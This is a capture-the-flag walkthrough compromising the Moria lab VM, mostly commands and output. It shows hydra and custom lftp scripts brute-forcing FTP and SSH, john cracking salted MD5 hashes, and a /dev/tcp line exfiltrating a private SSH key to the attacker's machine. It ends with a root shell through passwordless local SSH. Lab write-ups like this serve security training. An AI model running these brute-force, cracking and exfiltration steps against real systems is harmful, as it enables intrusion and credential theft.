Moria CTF Walkthrough - DigiP

1. Moria CTF Walkthrough - DigiP
2.  
3. netdiscover
4. 192.168.1.251 08:00:27:9a:4f:a4 6 360 PCS Systemtechnik GmbH
5.  
6.  
7. nmap -sC -sV -T5 -v -p- --open --script vuln 192.168.1.251
8. PORT STATE SERVICE VERSION
9. 21/tcp open ftp vsftpd 2.0.8 or later
10. |_sslv2-drown:
11. 22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
12. 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
13. |_http-csrf: Couldn't find any CSRF vulnerabilities.
14. |_http-dombased-xss: Couldn't find any DOM based XSS.
15. | http-enum:
16. | /w/: Potentially interesting folder w/ directory listing
17. |_ /icons/: Potentially interesting folder w/ directory listing
18. |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
19. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
20. |_http-trace: TRACE is enabled
21. MAC Address: 08:00:27:9A:4F:A4 (Oracle VirtualBox virtual NIC)
22.  
23. view-source:http://192.168.1.251/w/h/i/s/p/e/r/the_abyss/
24.  
25. Telchar to Thrain:"That human is slow, don't give up yet"
26.  
27. Refreshing the page, messages change:
28. "Eru! Save us!"
29. "Is this the end?"
30. Fundin:"That human will never save us!"
31. "Knock knock"
32. Dain:"Is that human deaf? Why is it not listening?"
33. Ori:"Will anyone hear us?"
34. Balin: "Be quiet, the Balrog will hear you!"
35. Nain:"Will the human get the message?"
36. Maeglin:"The Balrog is not around, hurry!"
37. "We will die here.."
38. Oin:"Stop knocking!"
39.  
40.  
41. gobuster -u http://192.168.1.251/w/h/i/s/p/e/r/the_abyss -f -e -x txt,html,php,jpg,gif,png,zip,sql,lock,conf,git,md -w /usr/share/wordlists/dirb/common.txt
42.  
43. view-source:http://192.168.1.251/w/h/i/s/p/e/r/the_abyss/random.txt
44. Balin: "Be quiet, the Balrog will hear you!"
45. Oin:"Stop knocking!"
46. Ori:"Will anyone hear us?"
47. Fundin:"That human will never save us!"
48. Nain:"Will the human get the message?"
49. "Eru! Save us!"
50. "We will die here.."
51. "Is this the end?"
52. "Knock knock"
53. "Too loud!"
54. Maeglin:"The Balrog is not around, hurry!"
55. Telchar to Thrain:"That human is slow, don't give up yet"
56. Dain:"Is that human deaf? Why is it not listening?"
57.  
58. So index.php is reading in and echoing out the text of this file. Will see later if that comes in handy in any way for abuse.
59.  
60. manually connecting to the ftp server, the message we are greated with is:
61.  
62. 220 Welcome Balrog!
63. Name (Balrog:root): Balrog
64. 331 Please specify the password.
65. Password:
66.  
67. We'll try the name Balrog, and then the others we found in random.txt as we go. Our password wordlist, will consist of the words from the home page image, as well as our random.txt names and keywords in upper, lower, first upper, etc.
68.  
69. hydra -L /root/HDD2/ctf/moria/random -P /root/HDD2/ctf/moria/random ftp://192.168.1.251
70.  
71. In doing so, ftp closes, and ftps opens on port 900!
72.  
73. We try:
74. hydra -L /root/HDD2/ctf/moria/random -P /root/HDD2/ctf/moria/random ftps://192.168.1.251 -s 900
75. hydra -L /root/HDD2/ctf/moria/random -P /root/HDD2/ctf/moria/random ftp://192.168.1.251 -s 900 -S
76.  
77. and...that closed, and now ftp open again. Need to try this bit differently. Hydra does not seem to be waiting long enough for the responses and may
78. be crushing it.
79.  
80. Lets try something differet. lftp, is a scriptable ftp client. We can work through this in similar fashion to hydra, but in a more controlled way
81. through a bash script.
82.  
83. syntax: lftp -u $user,$pass sftp://target
84.  
85. So, lets try
86.  
87. Added to our hosts file:
88. 192.168.1.251 Balrog
89.  
90.  
91. moria.sh
92. ---------------------------
93. #!/bin/sh
94. while IFS='' read -r line || [[ -n "$line" ]]; do
95. #lets use one user at a time to not trigger port knock maybe, see where this happens.
96. echo $line #echo the password we try each time and monitor console to see what happens on each attempt
97. lftp -d -u Balrog,"$line" ftp://balrog:21/ << --EOF--
98. pwd
99. quit
100. --EOF--
101. done < "/root/HDD2/ctf/moria/random"
102. ---------------------------
103.  
104. we have to edit /etc/lftp.conf and add the following at the end of the file:
105.  
106. #set timeout
107. set net:timeout 2
108. set net:max-retries 2
109. set net:reconnect-interval-base 5
110.  
111. We'll run this like so:
112. bash moria.sh > moria.log
113.  
114. This will try connecting with the name we give in -u first argument, with the password form each line of the random wordlist file
115. If Balrog doens't work, then we edit the script and try the next name from random.txt and so on. This seems to not trigger the port close and open on 900
116.  
117. Now, the reason I redirected output to moria.log, is because much of this is going to scroll by and off screen. Looking through it in terminal scroll-back is a PITA, and we could potentially miss our login deets if not paying attention. moria.log will show the password we passed and their output for pwd, if it is
118. successful. The password would be the word on the line directly above the pwd command output.
119.  
120. If you see this not working and it trips over to port 900 and closes ftp, shorten your wordlist, wait for ftp to open again, rinse, repeat. This will not be a quick process with a long wordlist, so keep it simple(stupid). There are probably better ways of doing this, but hydra does not seem to be working for me at the moment and keeps triggering port 900 open and 21 closed, even when I specify individual logins. Also, SSH with hydra, closes the port almost
121. immediatly, so we'll have to be careful how we try our logins.
122.  
123. Output on the terminal will look similar to:
124. 220 Welcome Balrog!
125. ---> FEAT
126. <--- 211-Features:
127. <--- EPRT
128. <--- EPSV
129. <--- MDTM
130. <--- PASV
131. <--- REST STREAM
132. <--- SIZE
133. <--- TVFS
134. <--- UTF8
135. <--- 211 End
136. ---> AUTH TLS
137. <--- 530 Please login with USER and PASS.
138. ---> OPTS UTF8 ON
139. <--- 200 Always in UTF8 mode.
140. ---> USER Balrog
141.  
142. where our log that helps us find the password is:
143.  
144. Balin
145. Oin
146. Ori
147. mellon
148. Mellon
149. ftp://Balrog:Mellon@192.168.1.251:21/%2Fprison
150. Balrog
151.  
152. We see our password worked for "Mellon"
153.  
154. :)
155.  
156. so deets are "Balrog" and "Mellon"
157.  
158. However. /prison, does not look promising..
159.  
160. Trying this for SSH, we realize this isn't going to work here either:
161. ssh Balrog@192.168.1.251
162. Balrog@192.168.1.251's password:
163. Last failed login: Fri Apr 21 07:54:13 EDT 2017 from 192.168.1.66 on ssh:notty
164. There were 2 failed login attempts since the last successful login.
165. Last login: Sun Mar 12 22:39:59 2017
166.  
167. WRONG GATE!
168.  
169. Connection to 192.168.1.251 closed.
170. root@kali:/mnt/HDD2/ctf/moria#
171.  
172. sftp Balrog@192.168.1.251 900
173. Balrog@192.168.1.251's password:
174. Received message too long 173494863
175.  
176.  
177. so back to moria over ftp.
178.  
179. ftp Balrog
180. user: Balrog
181. pass: Mellon
182.  
183. pwd
184. /prison
185.  
186. we can't list or put any files up, denied.
187. keeps asking for pasv mode. We enter:
188. quote pasv
189. and now we can list files.
190.  
191. cd /var/www/html
192. ls
193. ftp> ls
194. 200 PORT command successful. Consider using PASV.
195. 150 Here comes the directory listing.
196. drwxr-xr-x 2 0 0 23 Mar 12 20:38 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
197. -r-------- 1 48 48 85 Mar 12 19:55 index.php
198. -r-------- 1 48 48 161595 Mar 11 23:12 moria.jpg
199. drwxr-xr-x 3 0 0 15 Mar 12 04:50 w
200. 226 Directory send OK.
201.  
202. We navigat to http://192.168.1.251/QlVraKW4fbIkXau9zkAPNGzviT3UKntl/ and gets us:
203. Prisoner's name Passkey
204. Balin c2d8960157fc8540f6d5d66594e165e0
205. Oin 727a279d913fba677c490102b135e51e
206. Ori 8c3c3152a5c64ffb683d78efc3520114
207. Maeglin 6ba94d6322f53f30aca4f34960203703
208. Fundin c789ec9fae1cd07adfc02930a39486a1
209. Nain fec21f5c7dcf8e5e54537cfda92df5fe
210. Dain 6a113db1fd25c5501ec3a5936d817c29
211. Thrain 7db5040c351237e8332bfbba757a1019
212. Telchar dd272382909a4f51163c77da6356cc6f
213.  
214. Also viewing source we find:
215. <!--
216.  
217. 6MAp84
218. bQkChe
219. HnqeN4
220. e5ad5s
221. g9Wxv7
222. HCCsxP
223. cC5nTr
224. h8spZR
225. tb9AWe
226.  
227. MD5(MD5(Password).Salt)
228.  
229. -->
230. We can try and build a hash file for john like so:
231.  
232. Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
233. Oin:727a279d913fba677c490102b135e51e$bQkChe
234. Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
235. Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
236. Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
237. Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
238. Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
239. Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
240. Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe
241.  
242. john --list=subformats
243.  
244. We want: MD5(MD5(Password).Salt)
245. UserFormat = dynamic_2006 type = dynamic_2006: md5(md5($p).$s) (PW > 55 bytes)
246.  
247. john hashes --format=dynamic_2006 --fork=25 -w=/usr/share/wordlists/rockyou.txt
248.  
249. darkness (Thrain)
250. magic (Telchar)
251. abcdef (Dain)
252. hunter2 (Fundin)
253. spanky (Ori)
254. warrior (Nain)
255. rainbow (Oin)
256. flower (Balin)
257. fuckoff (Maeglin)
258.  
259. Nice and quick!!
260.  
261. We already know Balrog is Mellon and not going to work on SSH.
262.  
263. We've now got some more items we can add to a password/wordlist
264.  
265. ftp logins with the above don't seem to work. we can try triggering port 900 again, and seeing if any of these will work.
266.  
267. We try:
268. hydra -l Balin -P random ftps://balrog -s900
269. hydra -l Balin -P random ftp://balrog -s900 -S
270.  
271. Neither work
272. :(
273.  
274. hydra -L names -P random ftps://balrog -s900
275. hydra -L names -P random ftp://balrog -s900 -S
276.  
277. we can adjust our lftp script again.
278.  
279. ---------------------------
280. #!/bin/sh
281. while IFS='' read -r line || [[ -n "$line" ]]; do
282. #lets use one user at a time to not trigger port knock maybe, see where this happens.
283. echo $line #echo the password we try each time and monitor console to see what happens on each attempt
284. lftp -d -u Balin,"$line" ftps://192.168.1.251:900/ << --EOF--
285. pwd
286. quit
287. --EOF--
288. #end of file delimeter
289. done < "/root/HDD2/ctf/moria/random"
290. ---------------------------
291.  
292.  
293. so none of these seem to work for ftp or ftps
294.  
295. Lets try ssh:
296.  
297. hydra -L names -P random ssh://balrog
298.  
299. thesearen't going well with hydra. Ports keep closing, including SSH. lftp doesn't suport ssh either. So, we try each user, one at a time.
300.  
301. --------------------------
302. #!/bin/sh
303. ## balrog ssh attempts
304. sshpass -f <(printf '%s\n' darkness) ssh Thrain@balrog
305. sshpass -f <(printf '%s\n' magic) ssh Telchar@balrog
306. sshpass -f <(printf '%s\n' abcdef) ssh Dain@balrog
307. sshpass -f <(printf '%s\n' hunter2) ssh Fundin@balrog
308. sshpass -f <(printf '%s\n' spanky) ssh Ori@balrog
309. sshpass -f <(printf '%s\n' warrior) ssh Nain@balrog
310. sshpass -f <(printf '%s\n' rainbow) ssh Oin@balrog
311. sshpass -f <(printf '%s\n' flower) ssh Balin@balrog
312. sshpass -f <(printf '%s\n' fuckoff) ssh Maeglin@balrog
313. --------------------------
314.  
315. And with that, we get:
316.  
317. bash moria.sh
318. Permission denied, please try again.
319. Permission denied, please try again.
320. Permission denied, please try again.
321. Permission denied, please try again.
322. Last login: Sun Mar 12 22:57:09 2017
323. -bash-4.2$ id
324. uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)
325. -bash-4.2$
326.  
327. boom! login with ori!
328.  
329. Ori pts/0 2017-04-21 09:28 (192.168.1.66)
330. -bash-4.2$ uname -a;cat /etc/*ele*; cat /etc/issue
331. Linux Moria 3.10.0-514.el7.x86_64 #1 SMP Tue Nov 22 16:42:41 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
332. CentOS Linux release 7.3.1611 (Core)
333. Derived from Red Hat Enterprise Linux 7.3 (Source)
334. NAME="CentOS Linux"
335. VERSION="7 (Core)"
336. ID="centos"
337. ID_LIKE="rhel fedora"
338. VERSION_ID="7"
339. PRETTY_NAME="CentOS Linux 7 (Core)"
340. ANSI_COLOR="0;31"
341. CPE_NAME="cpe:/o:centos:centos:7"
342. HOME_URL="https://www.centos.org/"
343. BUG_REPORT_URL="https://bugs.centos.org/"
344.  
345. CENTOS_MANTISBT_PROJECT="CentOS-7"
346. CENTOS_MANTISBT_PROJECT_VERSION="7"
347. REDHAT_SUPPORT_PRODUCT="centos"
348. REDHAT_SUPPORT_PRODUCT_VERSION="7"
349.  
350. CentOS Linux release 7.3.1611 (Core)
351. CentOS Linux release 7.3.1611 (Core)
352. cpe:/o:centos:centos:7
353. ▄▀▀▄ ▄▀▄ ▄▀▀▀▀▄ ▄▀▀▄▀▀▀▄ ▄▀▀█▀▄ ▄▀▀█▄
354. █ █ ▀ █ █ █ █ █ █ █ █ █ ▐ ▄▀ ▀▄
355. ▐ █ █ █ █ ▐ █▀▀█▀ ▐ █ ▐ █▄▄▄█
356. █ █ ▀▄ ▄▀ ▄▀ █ █ ▄▀ █
357. ▄▀ ▄▀ ▀▀▀▀ █ █ ▄▀▀▀▀▀▄ █ ▄▀
358. █ █ ▐ ▐ █ █ ▐ ▐
359. ▐ ▐ ▐ ▐
360.  
361. -bash-4.2$
362.  
363. -bash-4.2$ cat /etc/passwd
364. root:x:0:0:root:/root:/bin/bash
365. bin:x:1:1:bin:/bin:/sbin/nologin
366. daemon:x:2:2:daemon:/sbin:/sbin/nologin
367. adm:x:3:4:adm:/var/adm:/sbin/nologin
368. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
369. sync:x:5:0:sync:/sbin:/bin/sync
370. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
371. halt:x:7:0:halt:/sbin:/sbin/halt
372. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
373. operator:x:11:0:operator:/root:/sbin/nologin
374. games:x:12:100:games:/usr/games:/sbin/nologin
375. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
376. nobody:x:99:99:Nobody:/:/sbin/nologin
377. systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin
378. systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
379. dbus:x:81:81:System message bus:/:/sbin/nologin
380. polkitd:x:998:997:User for polkitd:/:/sbin/nologin
381. tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
382. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
383. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
384. chrony:x:997:995::/var/lib/chrony:/sbin/nologin
385. geoclue:x:996:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
386. usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
387. rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
388. colord:x:995:993:User for colord:/var/lib/colord:/sbin/nologin
389. pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
390. gdm:x:42:42::/var/lib/gdm:/sbin/nologin
391. apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
392. abatchy:x:1000:1003::/home/abatchy:/bin/bash
393. Balrog:x:1001:1001::/prison:/sbin/nologin
394. Ori:x:1002:1003::/home/Ori:/bin/bash
395.  
396.  
397. cd /home
398. ls
399. batchy Ori
400. -bash-4.2$ cd abatchy/
401. -bash: cd: abatchy/: Permission denied
402. -bash-4.2$ cd Ori/
403. -bash-4.2$ ls -la
404. total 8
405. drwx------ 3 Ori notBalrog 55 Mar 12 22:57 .
406. drwxr-x---. 4 root notBalrog 32 Mar 14 00:36 ..
407. -rw------- 1 Ori notBalrog 1 Mar 14 00:12 .bash_history
408. -rw-r--r-- 1 root root 225 Mar 13 23:53 poem.txt
409. drwx------ 2 Ori notBalrog 57 Mar 12 22:57 .ssh
410. -bash-4.2$ cat .bash_history
411.  
412. -bash-4.2$ cat poem.txt
413. Ho! Ho! Ho! to the bottle I go
414. To heal my heart and drown my woe.
415. Rain may fall and wind may blow,
416. And many miles be still to go,
417. But under a tall tree I will lie,
418. And let the clouds go sailing by.
419.  
420. PS: Moria will not fall!
421. -bash-4.2$
422.  
423. we tarball .ssh files and send them back to us for the keys.
424.  
425. id_rsa file seems corrupt, lets send by itself
426. cat id_rsa >& /dev/tcp/192.168.1.66/443 0>&1
427.  
428. Later we find these don't work because known_hosts, indicates that the user is logging into SSH is over 127.0.0.1 from the logged in account. This requirs us to ssh while logged in as Ori To root? Oh yeah!
429.  
430. -bash-4.2$ cat known_hosts
431. 127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=
432. -bash-4.2$ #hmm. 127.0.0.1 you don't say...
433. -bash-4.2$ ssh root@127.0.0.1
434. Last login: Fri Apr 21 10:32:40 2017 from 127.0.0.1
435. [root@Moria ~]# #winner winner chicken dinner, no password asked..
436. [root@Moria ~]# ls -lash
437. total 52K
438. 0 dr-xr-x---. 8 root root 276 Mar 12 23:02 .
439. 0 dr-xr-xr-x. 18 root root 258 Mar 14 00:36 ..
440. 4.0K -rw-r--r-- 1 root root 21 Mar 12 21:44 0
441. 4.0K -rw-------. 1 root root 1.3K Mar 9 22:41 anaconda-ks.cfg
442. 4.0K -rw-------. 1 root root 325 Apr 21 10:33 .bash_history
443. 4.0K -rw-r--r-- 1 root root 18 Dec 28 2013 .bash_logout
444. 4.0K -rw-r--r-- 1 root root 176 Dec 28 2013 .bash_profile
445. 4.0K -rw-r--r-- 1 root root 176 Dec 28 2013 .bashrc
446. 0 drwx------. 7 root root 86 Mar 9 23:47 .cache
447. 0 drwxr-xr-x. 10 root root 128 Mar 9 23:10 .config
448. 4.0K -rw-r--r-- 1 root root 100 Dec 28 2013 .cshrc
449. 0 drwxr-xr-x. 2 root root 6 Mar 9 23:10 Desktop
450. 4.0K -rw-r--r-- 1 root root 439 Mar 13 23:57 flag.txt
451. 4.0K -rw-r--r-- 1 root root 20 Mar 11 21:00 hosts
452. 12K -rw-------. 1 root root 8.5K Mar 12 22:30 .ICEauthority
453. 0 drwx------. 3 root root 19 Mar 9 23:10 .local
454. 0 drwxr-----. 3 root root 19 Mar 11 11:35 .pki
455. 0 drwx------ 2 root root 48 Mar 12 23:00 .ssh
456. 4.0K -rw-r--r-- 1 root root 129 Dec 28 2013 .tcshrc
457. [root@Moria ~]# cat flag.txt
458. “All that is gold does not glitter,
459. Not all those who wander are lost;
460. The old that is strong does not wither,
461. Deep roots are not reached by the frost.
462.  
463. From the ashes a fire shall be woken,
464. A light from the shadows shall spring;
465. Renewed shall be blade that was broken,
466. The crownless again shall be king.”
467.  
468. All That is Gold Does Not Glitter by J. R. R. Tolkien
469.  
470. I hope you suff.. enjoyed this VM. It wasn't so hard, was it?
471. -Abatchy
472.  
473. [root@Moria ~]#
474.  
475.  
476. :)